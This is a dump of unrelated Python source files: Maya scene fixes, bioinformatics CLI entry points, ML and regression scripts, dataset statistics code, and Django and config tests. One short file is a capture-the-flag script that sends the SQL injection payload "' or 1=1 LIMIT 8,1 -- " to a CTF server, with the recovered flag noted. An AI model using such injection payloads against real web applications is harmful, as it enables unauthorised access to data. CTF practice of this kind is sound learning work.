content
stringlengths 5
1.05M
|
|---|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
import maya.cmds as cmds
import maya.OpenMaya as om
import locale
_LOCALE, _ = locale.getdefaultlocale()
if _LOCALE == 'ko_KR':
_UNLOCK_MSG = u" lambert1 이 lock 되어있는 문제를 수정하였습니다.\n 수정한 scene 을 저장하십시오."
else:
_UNLOCK_MSG = u' The lambert1 locking issue has been solving.\n Save the scene file, please.'
_INITIAL_SHADERS = ['initialShadingGroup', 'initialParticleSE', 'lambert1']
def iterLockedInitialShaders():
nodes = cmds.ls(_INITIAL_SHADERS, r=True)
if nodes:
for node in nodes:
locked = cmds.lockNode(node, q=True, lu=True)
if locked[0]:
yield node
def unLockInitialShaders(*args):
lockShaders = list(iterLockedInitialShaders())
if lockShaders:
for node in lockShaders:
print('unlock node -> "{}"'.format(node))
cmds.lockNode(node, l=False, lu=False)
cmds.inViewMessage(bkc=0x09e2e2e, msg=_UNLOCK_MSG, fst=3200, fade=6, fts=14, font='Arial', pos='midCenterTop')
def beforeSaveCallback():
# Unlock Lambert1 before SceneSaved
om.MSceneMessage.addCallback(om.MSceneMessage.kBeforeSave, unLockInitialShaders)
|
import pytest
def test_test():
pass
|
from rx import Observer
class MovieObserver(Observer):
"""Listen and receive movies from an Observable object."""
def on_next(self, value):
print("Received: {}".format(value))
def on_error(self, error):
print("Error: {}".format(error))
def on_completed(self):
print("All movies done!")
|
from pacco.cli.commands.utils.command_abstract import CommandAbstract
from pacco.manager.abstracts.remote import RemoteAbstract
class Remote(CommandAbstract):
def list(self, *args):
"""
List existing remotes.
"""
parser = self.init_parser('list')
parser.parse_args(args)
remotes: List[RemoteAbstract] = self.rm.list_remote()
self.out.writeln(remotes)
def add(self, *args):
"""
Add a remote.
"""
parser = self.init_parser('add')
parser.add_argument("name", help="remote name")
parser.add_argument("type", help="remote type, choices: 'local', 'nexus_site', 'webdav', 'nexus3'")
parser.add_argument("args", help="remote args, a comma separated value(s) (with no space) depending on the "
"remote type. "
"(1) For local, it's the path (can be empty). "
"(2) For nexus_site, it's the url, username, and password. "
"(3) For webdav, it's the host url, directory path, username, and password "
"(4) For nexus3, it's the host url, repository name, username and password")
parsed_args = parser.parse_args(args)
if parsed_args.type == "local":
path = parsed_args.args
if path == 'default':
path = ''
self.rm.add_remote(parsed_args.name, {
"remote_type": "local",
"path": path
})
elif parsed_args.type == "nexus_site":
nexus_args = parsed_args.args.split(',')
self.rm.add_remote(parsed_args.name, {
"remote_type": "nexus_site",
"url": nexus_args[0],
"username": nexus_args[1],
"password": nexus_args[2]
})
elif parsed_args.type == "webdav":
webdav_args = parsed_args.args.split(',')
self.rm.add_remote(parsed_args.name, {
"remote_type": "webdav",
"host_path": (webdav_args[0], webdav_args[1]),
"credential": (webdav_args[2], webdav_args[3]),
})
elif parsed_args.type == 'nexus3':
nexus3_args = parsed_args.args.split(',')
self.rm.add_remote(parsed_args.name, {
"remote_type": "nexus3",
"host_path": (nexus3_args[0], '/'),
"repository_name": nexus3_args[1],
"credential": (nexus3_args[2], nexus3_args[3]),
})
else:
raise NameError("The remote type you provided is not valid.")
def remove(self, *args):
"""
Remove a remote.
"""
parser = self.init_parser('remove')
parser.add_argument("name", help="remote name")
parsed_args = parser.parse_args(args)
self.rm.remove_remote(parsed_args.name)
def set_default(self, *args):
"""
Set default remote(s).
"""
parser = self.init_parser('set_default')
parser.add_argument("name", nargs="*", help="remote name")
parsed_args = parser.parse_args(args)
self.rm.set_default(parsed_args.name)
def list_default(self, *args):
"""
List default remote(s).
"""
parser = self.init_parser('list_default')
parser.parse_args(args)
default_remotes = self.rm.get_default()
self.out.writeln(default_remotes)
|
from typing import Any, Callable, Iterator, List, Mapping, Optional
import numpy as np
import sacrebleu
from tqdm import tqdm
from datalabs.operations.aggregate.aggregating import Aggregating, aggregating
from datalabs.operations.featurize import get_gender_bias
from datalabs.operations.operation import dataset_operation, DatasetOperation
class TextMatchingAggregating(Aggregating, DatasetOperation):
def __init__(
self,
name: str = None,
func: Callable[..., Any] = None,
resources: Optional[Mapping[str, Any]] = None,
contributor: str = None,
processed_fields: List = ["text1", "text2"],
generated_field: str = None,
task="text-matching",
description=None,
):
super().__init__(
name=name,
func=func,
resources=resources,
contributor=contributor,
task=task,
description=description,
)
self._type = "TextMatchingAggregating"
self.processed_fields = ["text1", "text2"]
if isinstance(processed_fields, str):
self.processed_fields[0] = processed_fields
else:
self.processed_fields = processed_fields
self.generated_field = generated_field
self._data_type = "Dataset"
class text_matching_aggregating(aggregating, dataset_operation):
def __init__(
self,
name: Optional[str] = None,
resources: Optional[Mapping[str, Any]] = None,
contributor: str = None,
processed_fields: List = ["text1", "text2"],
generated_field: str = None,
task="text-matching",
description=None,
):
super().__init__(
name=name,
resources=resources,
contributor=contributor,
description=description,
)
self.processed_fields = processed_fields
self.generated_field = generated_field
self.task = task
def __call__(self, *param_arg):
if callable(self.name):
tf_class = TextMatchingAggregating(name=self.name.__name__, func=self.name)
return tf_class(*param_arg)
else:
f = param_arg[0]
name = self.name or f.__name__
tf_cls = TextMatchingAggregating(
name=name,
func=f,
resources=self.resources,
contributor=self.contributor,
processed_fields=self.processed_fields,
generated_field=self.generated_field,
task=self.task,
description=self.description,
)
return tf_cls
def get_similarity_by_sacrebleu(text1, text2):
# pip install sacrebleu
references = [text1]
hypothesis = text2
score = sacrebleu.sentence_bleu(hypothesis, references).score
return score
@text_matching_aggregating(
name="get_statistics",
contributor="datalab",
task="text-matching, natural-language-inference",
description="Calculate the overall statistics (e.g., average length) of a given "
"text pair classification datasets. e,g. natural language inference",
)
def get_statistics(samples: Iterator):
"""
Input:
samples: [{
"text1":
"text2":
}]
Output:
dict:
usage:
you can test it with following code:
from datalabs import load_dataset
from aggregate.text_matching import *
dataset = load_dataset('sick')
res = dataset['test'].apply(get_statistics)
print(next(res))
"""
# for hate speech
# from hatesonar import Sonar
# sonar = Sonar()
sample_infos = []
text1_lengths = []
text2_lengths = []
labels_to_number = {}
vocab = {}
number_of_tokens = 0
gender_results = []
# hatespeech = {
# "hate_speech":{"ratio":0,"texts":[]},
# "offensive_language":{"ratio":0,"texts":[]},
# "neither":{"ratio":0,"texts":[]}}
text1_divided_text2 = []
similarities = []
for sample in tqdm(samples):
text1, text2, label = sample["text1"], sample["text2"], sample["label"]
similarity_of_text_pair = get_similarity_by_sacrebleu(text1, text2)
similarities.append(similarity_of_text_pair)
# average length of text1
text1_length = len(text1.split(" "))
text1_lengths.append(text1_length)
# average length of text2
text2_length = len(text2.split(" "))
text2_lengths.append(text2_length)
# text1/text2
text1_divided_text2.append(len(text1.split(" ")) / len(text2.split(" ")))
# label info
if label in labels_to_number.keys():
labels_to_number[label] += 1
else:
labels_to_number[label] = 1
# update the number of tokens
number_of_tokens += len(text1.split())
number_of_tokens += len(text2.split())
# Vocabulary info
for w in (text1 + text2).split(" "):
if w in vocab.keys():
vocab[w] += 1
else:
vocab[w] = 1
# Gender info
gender_result1 = get_gender_bias.func(text1)
gender_result2 = get_gender_bias.func(text2)
gender_results.append(gender_result1["gender_bias_info"])
gender_results.append(gender_result2["gender_bias_info"])
# hataspeech
# results = sonar.ping(text=text1)
# class_1 = results['top_class']
# confidence = 0
# for value in results['classes']:
# if value['class_name'] == class_1:
# confidence = value['confidence']
# break
#
# hatespeech[class_1]["ratio"] += 1
# if class_1 != "neither":
# hatespeech[class_1]["texts"].append(text1)
# results = sonar.ping(text=text2)
# class_2 = results['top_class']
# confidence = 0
# for value in results['classes']:
# if value['class_name'] == class_2:
# confidence = value['confidence']
# break
#
# hatespeech[class_2]["ratio"] += 1
# if class_2 != "neither":
# hatespeech[class_2]["texts"].append(text2)
sample_info = {
"text1": text1,
"text2": text2,
"label": label,
"text1_length": text1_length,
"text2_length": text2_length,
"text1_gender": gender_result1,
"text2_gender": gender_result2,
# "text1_hate_speech_class":class_1,
# "text2_hate_speech_class":class_2,
"text1_divided_text2": len(text1.split(" ")) / len(text2.split(" ")),
"similarity_of_text_pair": similarity_of_text_pair,
}
if len(sample_infos) < 10000:
sample_infos.append(sample_info)
# ------------------ Dataset-level ----------------
# get vocabulary
vocab_sorted = dict(sorted(vocab.items(), key=lambda item: item[1], reverse=True))
# compute dataset-level gender_ratio
gender_ratio = {
"word": {"male": 0, "female": 0},
"single_name": {"male": 0, "female": 0},
}
for result in gender_results:
res_word = result["word"] # noqa
gender_ratio["word"]["male"] += result["word"]["male"]
gender_ratio["word"]["female"] += result["word"]["female"]
gender_ratio["single_name"]["male"] += result["single_name"]["male"]
gender_ratio["single_name"]["female"] += result["single_name"]["female"]
n_gender = gender_ratio["word"]["male"] + gender_ratio["word"]["female"]
if n_gender != 0:
gender_ratio["word"]["male"] /= n_gender
gender_ratio["word"]["female"] /= n_gender
else:
gender_ratio["word"]["male"] = 0
gender_ratio["word"]["female"] = 0
n_gender = (
gender_ratio["single_name"]["male"] + gender_ratio["single_name"]["female"]
)
if n_gender != 0:
gender_ratio["single_name"]["male"] /= n_gender
gender_ratio["single_name"]["female"] /= n_gender
else:
gender_ratio["single_name"]["male"] = 0
gender_ratio["single_name"]["female"] = 0
# get ratio of hate_speech:offensive_language:neither
# for k,v in hatespeech.items():
# hatespeech[k]["ratio"] /= 2* len(samples)
res = {
"dataset-level": {
"length_info": {
"max_text1_length": np.max(text1_lengths),
"min_text1_length": np.min(text1_lengths),
"average_text1_length": np.average(text1_lengths),
"max_text2_length": np.max(text2_lengths),
"min_text2_length": np.min(text2_lengths),
"average_text2_length": np.average(text2_lengths),
"text1_divided_text2": np.average(text1_divided_text2),
},
"label_info": {
"ratio": min(labels_to_number.values())
* 1.0
/ max(labels_to_number.values()),
"distribution": labels_to_number,
},
"vocabulary_info": vocab_sorted,
"number_of_samples": len(samples),
"number_of_tokens": number_of_tokens,
"gender_info": gender_ratio,
"average_similarity": np.average(similarities),
# "hatespeech_info": hatespeech,
},
"sample-level": sample_infos,
}
return res
|
#!/usr/bin/env python
"""
Define command line entry for tool `pbsvp`, including
pbsvp polish
pbsvp collect
Define `pbsvputil`, utils for `pbsvp`, including
pbsvputil trim-lq
pbsvputil transform-coordinate
pbsvputil svdagcon
"""
import sys
import logging
from .__init__ import (get_version, POLISH_ENTRY, COLLECT_ENTRY, TRIM_ENTRY,
SVDAGCON_ENTRY, TRANSFORM_ENTRY, EXTRACTSR_ENTRY)
from pbsv.__utils import (get_default_argparser, setup_log, main_runner,
compose, subparser_builder, validate_file, args_executer)
from .argsutil import (add_polish_parser_options, add_collect_parser_options,
add_trim_parser_options, add_transform_parser_options,
add_svdagcon_parser_options, add_extractsr_parser_options)
from .utils import make_subreads_bam_of_zmws2
from .polish import polish_desc, run_polish
from .collect import collect_desc, run_collect
from .trim_lq import trim_desc, run_trim
from .transform_coordinates import transform_desc, run_transform
from .svdagcon import svdagcon_desc, run_svdagcon
log = logging.getLogger()
slog = logging.getLogger('status.' + __file__)
def _args_run_polish(args):
"""Run `pbsvp polish`"""
log.info("Running `{}`".format(POLISH_ENTRY))
log.debug('Locals={}'.format(locals()))
run_polish(genome_fa=args.genome_fa, subreads_xml_fn=args.subreads_bam, aln_fn=args.alignments_bam,
in_bed_fn=args.in_rich_bed, out_dir=args.out_dir,
min_coverage=args.min_coverage, min_qv=args.min_qv,
ref_ext_len=args.ref_ext_len, use_sge=args.use_sge)
return 0
def _args_run_collect(args):
"""Run `pbsvp collect`"""
log.info("Running `{}`".format(COLLECT_ENTRY))
log.debug('Locals={}'.format(locals()))
run_collect(work_dir=args.work_dir, collected_bed_fn=args.out_bed_or_vcf_fn,
min_qv=args.min_qv, ref_ext_len=args.ref_ext_len)
return 0
def _args_run_trim(args):
log.info("Running `{}`".format(TRIM_ENTRY))
log.debug('Locals={}'.format(locals()))
run_trim(i_fn=args.in_fa_or_fq_fn, o_fn=args.out_fa_or_fq_fn,
min_qv=args.min_qv, windowsize=args.qv_windowsize)
return 0
def _args_run_svdagcon(args):
log.info("Running `{}`".format(SVDAGCON_ENTRY))
log.debug('Locals={}'.format(locals()))
run_svdagcon(input_subreads_bam=args.subreads_bam, ref_fa=args.ref_fa,
output_prefix=args.output_prefix, consensus_id=args.consensus_id,
nproc=args.nproc, max_score=args.max_score,
use_first_seq_if_fail=args.use_first_seq_if_fail)
return 0
def _args_run_transform(args):
log.info('Running `{}`'.format(TRANSFORM_ENTRY))
log.debug('Locals={}'.format(locals()))
run_transform(i_fn=args.in_bed_or_vcf_fn, o_fn=args.out_bed_or_vcf_fn)
return 0
def _args_run_extract_subreads(args):
log.info('Running `{}`'.format(EXTRACTSR_ENTRY))
log.debug('Locals={}'.format(locals()))
make_subreads_bam_of_zmws2(in_subreads_fn_or_obj=args.in_bam_or_xml,
zmws=args.zmws, out_bam_fn=args.out_bam_or_xml,
out_fa_fn=args.out_bam[0:args.out_bam.rfind('.')]+'.fasta')
return 0
def pbsvp_get_parser():
"""Get parser for pbsvp subcommands"""
desc = "PacBio Structural Variants Polish Tool Suite"
p = get_default_argparser(version=get_version(), description=desc)
sp = p.add_subparsers(help='commands')
def builder(subparser_id, description, options_func, exe_func, epilog=None):
"""subparser builder"""
subparser_builder(sp, subparser_id, description, options_func, exe_func, epilog)
# `pbsvp polish`, polish structural variants
polish_desc = "Polish structural variants"
builder('polish', polish_desc, add_polish_parser_options, _args_run_polish)
# `pbsvp collect`, collect polished structural variants
collect_desc = "Collect polished structural variants"
builder('collect', collect_desc, add_collect_parser_options, _args_run_collect)
return p
def pbsvputil_get_parser():
"""Get parser for pbsvputil subcommands"""
desc = "PacBio Structural Variants Polish Utils"
p = get_default_argparser(version=get_version(), description=desc)
sp = p.add_subparsers(help='commands')
def builder(subparser_id, description, options_func, exe_func, epilog=None):
"""subparser builder"""
subparser_builder(sp, subparser_id, description, options_func, exe_func, epilog)
# `pbsvputil trim-lq`
builder('trim-lq', trim_desc, add_trim_parser_options, _args_run_trim)
# `pbspvutil svdagcon`
builder('svdagcon', svdagcon_desc, add_svdagcon_parser_options, _args_run_svdagcon)
# `pbsvputil transform-coordinate`
builder('transform-coordinate', transform_desc, add_transform_parser_options, _args_run_transform)
# `pbsvputil extract-subreads`
extractsr_desc = """Extract subreads bam of zmws ('movie/zmw') from input subreads bam or xml."""
builder('extract-subreads', extractsr_desc, add_extractsr_parser_options, _args_run_extract_subreads)
return p
def pbsvp_main(argv=None):
"""pbsvp Main function, entry for command line tool `pbsvp`"""
argv_ = sys.argv if argv is None else argv
parser = pbsvp_get_parser()
return main_runner(argv_[1:], parser, args_executer, setup_log, log)
def pbsvputil_main(argv=None):
"""pbsvputil main function, entry for command line tool `pbsvputil`"""
argv_ = sys.argv if argv is None else argv
parser = pbsvputil_get_parser()
return main_runner(argv_[1:], parser, args_executer, setup_log, log)
|
from gradnet import Input, Model
from gradnet.layers import Dense, Conv2D, Pool, Flatten
from gradnet.activations import get_activation
from gradnet.optimizers import get_optimizer
from gradnet.losses import get_loss
from gradnet.metrics import get_metric
import numpy as np
from tensorflow.keras.datasets import mnist
accuracy = get_metric("accuracy")
def create_model():
relu = get_activation("relu")
cce = get_loss("cce")
mse = get_loss("mse")
inp = Input((28,28,1))
conv1 = Conv2D(3,3,32, activation="relu")(inp)
pool1 = Pool(2,2, "max")(conv1)
conv2 = Conv2D(3,3,64, activation="relu")(pool1)
pool2 = Pool(2,2, "max")(conv2)
flat = Flatten()(pool2)
top = Dense(10, name="top")(flat)
probs = get_activation("softmax", name="softmax")(top)
model = Model([inp], [probs])
model.add_loss(cce(probs))
sgd = get_optimizer("SGD", learning_rate=0.01, momentum=0.5)
model.compile(optimizer=sgd)
return model
(x_train, y_train), (x_test, y_test) = mnist.load_data()
def one_hot(labels, n):
out = np.zeros((len(labels), n))
for i in range(n):
out[labels==i, i] = 1.0
return out
x_train = (x_train/256.0).reshape((-1,28,28,1))
x_test = (x_test/256.0).reshape((-1,28,28,1))
n_train = len(x_train)
y_train = one_hot(y_train, 10)
y_test = one_hot(y_test, 10)
np.set_printoptions(precision=4, suppress=True)
model = create_model()
mbsize = 100
class Callback(object):
def __init__(self):
self.NextPrint = self.PrintEvery = 100
def train_batch_end(self, samples, loss_values, mvalues):
if samples >= self.NextPrint:
print(f"Samples: {samples}, losses:{loss_values}, metrics:{mvalues}")
self.NextPrint += self.PrintEvery
for epoch in range(10):
losses, metrics = model.fit(x_train, y_train, batch_size=30, metrics=[accuracy], callbacks=[Callback()])
y = model.compute(x_test)
y_ = y_test
acc = accuracy(y_test, y[0])
print("test accuracy:", acc)
|
from django.contrib.admin import AdminSite
from django.test import TestCase
from django.utils.translation import ugettext_lazy as _
from tests.example.admin import DetailInInlineExampleModelAdminInline
from tests.example.factories import DetailInInlineExampleModelFactory
from tests.example.models import DetailInInlineExampleModel
class MockRequest:
pass
class DetailInInlineAdminMixinUnitTest(TestCase):
def setUp(self) -> None:
self.site = AdminSite()
self.request = MockRequest()
def test_get_fields(self):
admin = DetailInInlineExampleModelAdminInline(DetailInInlineExampleModel, self.site)
self.assertEqual(
sorted(admin.get_fields(self.request)),
sorted(("display_inline_obj", "test_text"))
)
def test_get_readonly_fields(self):
admin = DetailInInlineExampleModelAdminInline(DetailInInlineExampleModel, self.site)
self.assertEqual(
sorted(admin.get_readonly_fields(self.request)),
sorted(("display_inline_obj",))
)
def test_display_inline_obj(self):
admin = DetailInInlineExampleModelAdminInline(DetailInInlineExampleModel, self.site)
obj = DetailInInlineExampleModelFactory()
self.assertEqual(
admin.display_inline_obj(obj),
'<a href="{0}" target="_blank" class="admin-button admin-button-success">{1}</a>'.format(
obj.admin_change_url, _("Detail")
)
)
|
import requests
url = lambda payload: 'http://sosimple.darkarmy.xyz/?id=' + payload
r = requests.post(url("' or 1=1 LIMIT 8,1 -- "))
print(r.text)
# darkCTF{uniqu3_ide4_t0_find_fl4g}
|
import matplotlib.pyplot as plt
from grid_search import GridSearch
from sklearn import datasets
from linear_regression import LassoRegression, RidgeRegression
X, y = datasets.load_boston(return_X_y=True)
models = [LassoRegression, RidgeRegression]
regularization_factors = [{'rf': rf/10} for rf in range(11)]
grid_search = GridSearch()
grid_search(models, regularization_factors, X, y)
plt.savefig(fname="lasso_ridge_rfs.jpg")
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, print_function, unicode_literals
import pytest
import sacred.optional as opt
from sacred.config import ConfigDict
from sacred.config.custom_containers import DogmaticDict, DogmaticList
@pytest.fixture
def conf_dict():
cfg = ConfigDict({
"a": 1,
"b": 2.0,
"c": True,
"d": 'string',
"e": [1, 2, 3],
"f": {'a': 'b', 'c': 'd'},
})
return cfg
def test_config_dict_returns_dict(conf_dict):
assert isinstance(conf_dict(), dict)
def test_config_dict_result_contains_keys(conf_dict):
cfg = conf_dict()
assert set(cfg.keys()) == {'a', 'b', 'c', 'd', 'e', 'f'}
assert cfg['a'] == 1
assert cfg['b'] == 2.0
assert cfg['c']
assert cfg['d'] == 'string'
assert cfg['e'] == [1, 2, 3]
assert cfg['f'] == {'a': 'b', 'c': 'd'}
def test_fixing_values(conf_dict):
assert conf_dict({'a': 100})['a'] == 100
@pytest.mark.parametrize("key", ["_underscore", "white space", 12, "12", "$f"])
def test_config_dict_raises_on_invalid_keys(key):
with pytest.raises(KeyError):
ConfigDict({key: True})
@pytest.mark.parametrize("value", [lambda x:x, pytest, test_fixing_values])
def test_config_dict_raises_on_invalid_values(value):
with pytest.raises(ValueError):
ConfigDict({"invalid": value})
def test_fixing_nested_dicts(conf_dict):
cfg = conf_dict({'f': {'c': 't'}})
assert cfg['f']['a'] == 'b'
assert cfg['f']['c'] == 't'
def test_adding_values(conf_dict):
cfg = conf_dict({'g': 23, 'h': {'i': 10}})
assert cfg['g'] == 23
assert cfg['h'] == {'i': 10}
assert cfg.added == {'g', 'h', 'h.i'}
def test_typechange(conf_dict):
cfg = conf_dict({'a': 'bar', 'b': 'foo', 'c': 1})
assert cfg.typechanged == {'a': (int, type('bar')),
'b': (float, type('foo')),
'c': (bool, int)}
def test_nested_typechange(conf_dict):
cfg = conf_dict({'f': {'a': 10}})
assert cfg.typechanged == {'f.a': (type('a'), int)}
def is_dogmatic(a):
if isinstance(a, (DogmaticDict, DogmaticList)):
return True
elif isinstance(a, dict):
return any(is_dogmatic(v) for v in a.values())
elif isinstance(a, (list, tuple)):
return any(is_dogmatic(v) for v in a)
def test_result_of_conf_dict_is_not_dogmatic(conf_dict):
cfg = conf_dict({'e': [1, 1, 1]})
assert not is_dogmatic(cfg)
@pytest.mark.skipif(not opt.has_numpy, reason="requires numpy")
def test_conf_scope_handles_numpy_bools():
cfg = ConfigDict({
"a": opt.np.bool_(1)
})
assert 'a' in cfg()
assert cfg()['a']
def test_conf_scope_contains_presets():
conf_dict = ConfigDict({
"answer": 42
})
cfg = conf_dict(preset={'a': 21, 'unrelated': True})
assert set(cfg.keys()) == {'a', 'answer', 'unrelated'}
assert cfg['a'] == 21
assert cfg['answer'] == 42
assert cfg['unrelated'] is True
def test_conf_scope_does_not_contain_fallback():
config_dict = ConfigDict({
"answer": 42
})
cfg = config_dict(fallback={'a': 21, 'b': 10})
assert set(cfg.keys()) == {'answer'}
def test_fixed_subentry_of_preset():
config_dict = ConfigDict({})
cfg = config_dict(preset={'d': {'a': 1, 'b': 2}}, fixed={'d': {'a': 10}})
assert set(cfg.keys()) == {'d'}
assert set(cfg['d'].keys()) == {'a', 'b'}
assert cfg['d']['a'] == 10
assert cfg['d']['b'] == 2
|
import socket
target_ip="127.0.0.1"
target_port=8888
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
while True:
data=input("Enter your message --->>> ")
msg=data.encode('ascii')
s.sendto(msg,(target_ip,target_port))
print(s.recvfrom(100))
|
import numpy as np
from .core import Nominable
from .params import Parameters, Scale, Precision
from csb.core import validatedproperty
class Probability(Nominable):
"""Probability
Generic class that will be subclassed by all probabilistic models.
"""
def log_prob(self):
raise NotImplementedError
def sample(self):
raise NotImplementedError
def __init__(self, name, params=None):
self.name = name
self.params = params or Parameters()
class Likelihood(Probability):
@validatedproperty
def data(values):
"""
Observed data stored in a single vector.
"""
return np.ascontiguousarray(values)
@validatedproperty
def grad(values):
"""
Array for storing derivatives of likelihood with respect to mock data.
"""
return np.ascontiguousarray(values)
@property
def beta(self):
"""
Inverse temperature.
"""
return self._beta.get()
@beta.setter
def beta(self, value):
self._beta.set(value)
def __init__(self, name, data, mock, beta=1.0, params=None):
"""Likelihood
Initialize likelihood by providing a name, the raw data
and a theory for calculating idealized obserations.
Parameters
----------
name : string
name of the likelihood function
data : iterable
list of raw data points
mock : instance of Parameters
theory for calculating idealized data (needs to implement
update_forces)
beta : non-negative float
inverse temperature used in tempering and annealing
"""
super(Likelihood, self).__init__(name, params)
self.data = data
self.mock = mock
self.grad = np.zeros(data.shape)
self._beta = Scale(self.name + '.beta')
self.params.add(self._beta)
self.beta = beta
def update(self):
self.mock.update(self.params)
def update_derivatives(self):
"""
Calculate derivative of log likelihood with respect to mock
data.
"""
raise NotImplementedError
def update_forces(self):
"""
Update Cartesian forces by applying the chain rule.
"""
self.update_derivatives()
self.mock.update_forces(self.grad, self.params)
class Normal(Likelihood):
"""Normal
Likelihood implementing a Normal distribution. It has a single
nuisance parameter: the precision, i.e. inverse variance
"""
@property
def precision(self):
"""
Inverse variance
"""
return self._precision
@property
def tau(self):
return self._precision.get()
@tau.setter
def tau(self, value):
self._precision.set(value)
@property
def sigma(self):
"""
Standard deviation
"""
return 1 / self.tau**0.5
def __init__(self, name, data, mock, precision=1.0, params=None):
super(Normal, self).__init__(name, data, mock, params=params)
self._precision = Precision(self.name + '.precision')
self.tau = precision
@property
def logZ(self):
"""
Normalization constant of the Normal distribution
"""
return - 0.5 * len(self.data) * np.log(0.5 * self.tau / np.pi)
def log_prob(self):
diff = self.mock.get() - self.data
log_prob = - 0.5 * self.tau * np.dot(diff,diff) - self.logZ
return self.beta * log_prob
def update_derivatives(self):
self.grad[...] = self.beta * self.tau * (self.data - self.mock.get())
def __str__(self):
s = super(Normal, self).__str__()
return s.replace(')', ', precision={0:0.3f})'.format(self.tau))
class LowerUpper(Normal):
"""LowerUpper
Error model implementing a Normal distribution with a flat plateau. The
start and end of the plateau are marked by lower bounds (stored in 'lower')
and upper bounds (stored in 'upper')
"""
@validatedproperty
def lower(values):
return np.ascontiguousarray(values)
@validatedproperty
def upper(values):
return np.ascontiguousarray(values)
@property
def logZ(self):
"""
Normalization constant
"""
from .lowerupper import logZ
return logZ(self.lower, self.upper, self.tau)
def __init__(self, name, data, mock, lower, upper, precision=1.0, params=None):
super(LowerUpper, self).__init__(name, data, mock, precision, params=params)
self.lower = lower
self.upper = upper
self.validate()
def log_prob(self):
from .lowerupper import log_prob
lgp = log_prob(self.data, self.mock.get(), self.lower, self.upper)
return 0.5 * self.beta * self.tau * lgp - self.beta * self.logZ
def update_derivatives(self):
from .lowerupper import update_derivatives
update_derivatives(self.mock.get(), self.grad, self.lower,
self.upper, self.beta * self.tau)
def validate(self):
if np.any(self.lower > self.upper):
msg = 'Lower bounds must be smaller than upper bounds'
raise ValueError(msg)
class Logistic(Likelihood):
"""Logistic
Logistic likelihood for binary observations.
"""
@property
def steepness(self):
"""
Steepness of logistic function.
"""
return self._steepness
@property
def alpha(self):
"""
Returns the current value of the steepness parameter.
"""
return self._steepness.get()
@alpha.setter
def alpha(self, value):
self._steepness.set(value)
def __init__(self, name, data, mock, steepness=1.0, params=None):
super(Logistic, self).__init__(name, data, mock, params=params)
self._steepness = Scale(self.name + '.steepness')
self.alpha = steepness
def log_prob(self):
from .logistic import log_prob
return self.beta * log_prob(self.data, self.mock.get(), self.alpha)
def update_derivatives(self):
from .logistic import update_derivatives
update_derivatives(self.data, self.mock.get(), self.grad, self.alpha)
self.grad *= self.beta
def __str__(self):
s = super(Logistic, self).__str__()
s = s.replace(')', ', steepness={0:0.3f})'.format(self.alpha))
return s
class Relu(Logistic):
"""Relu
Relu likelihood for binary observations.
"""
def log_prob(self):
from .relu import log_prob
return self.beta * log_prob(self.data, self.mock.get(), self.alpha)
def update_derivatives(self):
from .relu import update_derivatives
## self.grad[...] = 0.
update_derivatives(self.data, self.mock.get(), self.grad, self.alpha)
self.grad *= self.beta
|
# %%
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as pl
from sklearn.metrics import r2_score, mean_squared_error
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import statsmodels
import statsmodels.api as sm
from IPython.display import display
# %% [markdown]
'''
<h3>Constants</h3>
'''
# %%
TV = 'TV'
Radio = "Radio"
Newspaper = 'Newspaper'
Sales = 'Sales'
# %%
advertising = pd.read_csv("advertising.csv")
advertising.head()
# %%
advertising.shape
# %%
advertising.info()
# %%
advertising.describe()
# %%
advertising.isnull().any()
# %%
# visualize data
sns.regplot(x=TV, y=Sales, data=advertising)
# %%
sns.regplot(x=Radio, y=Sales, data=advertising)
# %%
sns.regplot(x=Newspaper, y=Sales, data=advertising)
# %%
sns.pairplot(advertising, x_vars=[
TV, Newspaper, Radio], y_vars=Sales, size=4, aspect=1, kind='scatter')
plt.show()
# %%
advertising.corr()
# %%
sns.heatmap(advertising.corr(), cmap="YlGnBu", annot=True)
# %%
# create X and y
X = advertising[TV]
y = advertising[Sales]
# %%
# train_test_split
X_train, X_test, y_train, y_test = train_test_split(
X, y, train_size=0.7, random_state=100)
X_train
# %%
# training the model
X_train_sm = sm.add_constant(X_train)
X_train_sm.head()
# %%
lr = sm.OLS(y_train, X_train_sm)
lr_model = lr.fit()
# %%
lr_model.params
# %%
lr_model.summary()
# %%
y_train_pred = lr_model.predict(X_train_sm)
y_train_pred
# %%
plt.scatter(X_train, y_train)
plt.plot(X_train, y_train_pred, 'r')
plt.show()
# %% [markdown]
'''
<h2>Residual Analysis</h2>
'''
# %%
# y_train, y_train_pred
res = y_train - y_train_pred
plt.figure()
sns.distplot(res)
plt.title("Residual Plot")
plt.show()
# %%
# look for patterns in Residual
plt.scatter(X_train, res)
plt.show()
# %% [markdown]
'''
<h2>Step 4: Predictions and evaluation on the test set</h2>
'''
# %%
# make test data
X_test_sm = sm.add_constant(X_test)
# predict on test data and eval data on r-squared and others
y_test_pred = lr_model.predict(X_test_sm)
# %%
y_test_pred.head()
# %%
r2_test = r2_score(y_test, y_test_pred)
r2_test
# %%
mean_squared_error(y_test, y_test_pred)
# %%
plt.scatter(X_test, y_test)
plt.plot(X_test, y_test_pred, 'r')
plt.show()
# %%
# Reshape to 140,1
X_train_lm = X_train.values.reshape(-1, 1)
X_test_lm = X_test.values.reshape(-1, 1)
X_test_lm.shape
# %%
lm = LinearRegression()
lm.fit(X_train_lm, y_train)
# %%
display(lm.coef_, lm.intercept_)
# %%
# make Predictions
y_train_pred = lm.predict(X_train_lm)
y_test_pred = lm.predict(X_test_lm)
# %%
plt.scatter(X_train, y_train)
plt.plot(X_train, y_train_pred, 'r')
plt.show()
# %%
plt.scatter(X_test, y_test)
plt.plot(X_test, y_test_pred, 'r')
plt.show()
# %%
print(r2_score(y_train, y_train_pred))
print(r2_score(y_test, y_test_pred))
# %%
|
#----------------------------------------------------------------
#- Linear Feature Learning for Kinship Verification in the Wild -
#----------------------------------------------------------------
#----------------------------------------------------------------
#- Find the best number of features -
#----------------------------------------------------------------
#- By: Abdellah SELLAM -
#- Hamid AZZOUNE -
#----------------------------------------------------------------
#- Created: 2018-04-08 -
#- Last update: 2018-07-12 -
#----------------------------------------------------------------
import os
import sys
import time
import numpy as np
import random as rd
import tensorflow as tf
from LoadData import LoadFoldGrayScale as LoadFold
from LoadData import SaveToCSV
# Set Random Iterator's initial value depending on current time, this Results
# in different random values each execusion
rd.seed(time.time())
# Set KinFaceW used set from Command line Prompt
